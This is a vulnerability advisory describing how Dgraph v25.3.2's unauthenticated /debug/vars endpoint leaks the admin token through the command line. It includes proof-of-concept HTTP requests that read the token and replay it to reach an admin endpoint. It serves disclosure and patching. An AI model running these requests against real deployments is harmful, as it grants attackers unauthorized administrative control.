CVE-2026-41492

Summary

Dgraph v25.3.2 still exposes the process command line through the unauthenticated /debug/vars endpoint on Alpha. Because the admin token is commonly supplied via the --security "token=..." startup flag, an unauthenticated attacker can retrieve that token and replay it in the X-Dgraph-AuthToken header to access admin-only endpoints.

This is a variant of the previously fixed /debug/pprof/cmdline issue, but the current fix is incomplete because it blocks only /debug/pprof/cmdline and still serves http.DefaultServeMux, which includes expvar's /debug/vars handler.

Details

Alpha still exposes Go's default HTTP mux:

• x/metrics.go
• imports expvar
• initializes Conf = expvar.NewMap("dgraph_config")
• Go's expvar package automatically registers /debug/vars
• expvar publishes:
• cmdline = os.Args
• memstats = runtime.Memstats

Alpha's HTTP handler explicitly blocks only the old CVE path:

• dgraph/cmd/alpha/run.go
• checks if r.URL.Path == "/debug/pprof/cmdline" and returns 404
• otherwise falls through to http.DefaultServeMux.ServeHTTP(w, r)

Admin endpoints still trust the leaked token:

• dgraph/cmd/alpha/admin.go
• reads X-Dgraph-AuthToken
• compares it to worker.Config.AuthToken

PoC

1. Send an unauthenticated request to Alpha:

GET /debug/vars HTTP/1.1
Host: target:8080

1. Parse the JSON response and read the cmdline field.
2. Extract the admin token from the startup arguments, for example:

--security token=debug-vars-secret;

1. Replay the token to an admin-only endpoint:

GET /admin/config/cache_mb HTTP/1.1
Host: target:8080
X-Dgraph-AuthToken: debug-vars-secret

1. The request is accepted as an authorized admin request.

This was reproduced against dgraph/dgraph:v25.3.2 in Docker.

Observed behavior:

• unauthenticated /debug/vars leaked the configured token
• replaying the leaked token in X-Dgraph-AuthToken successfully accessed /admin/config/cache_mb
• response body was:

4096

It was verified that the old CVE path appears specifically patched in the same version:

• /debug/pprof/cmdline returned 404 Not Found
• /debug/pprof/ remained reachable

Impact

Unauthenticated attackers can obtain the Alpha admin token and gain unauthorized administrative access.

This enables privileged admin operations such as:

• reading privileged admin configuration
• mutating admin configuration
• performing operational control actions gated by X-Dgraph-AuthToken

In deployments where the Alpha HTTP port is reachable by untrusted parties, this is a practical authentication bypass to admin functionality.